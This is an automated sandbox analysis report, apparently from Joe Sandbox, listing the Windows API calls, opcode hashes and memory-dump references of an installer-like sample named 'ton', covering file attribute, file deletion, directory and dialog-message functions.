                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                      • API String ID: 415043291-0
                                                                                                                                                                                                                                                                                                      • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                                                      • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                      • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                                      • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                      • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                                      • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                      • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                                                      • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                                      • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                      • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                                                      • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                      • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                                                      • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                      • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                                                      • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                      • API String ID: 2492992576-0
                                                                                                                                                                                                                                                                                                      • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                                                      • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                                                      • String ID: $ @$M$N
                                                                                                                                                                                                                                                                                                      • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                                                      • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                                                      • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                                                      • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                                                      • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                                                      • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                                                      • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                                                      • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                                                      • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                                                      • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                                                                                      • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
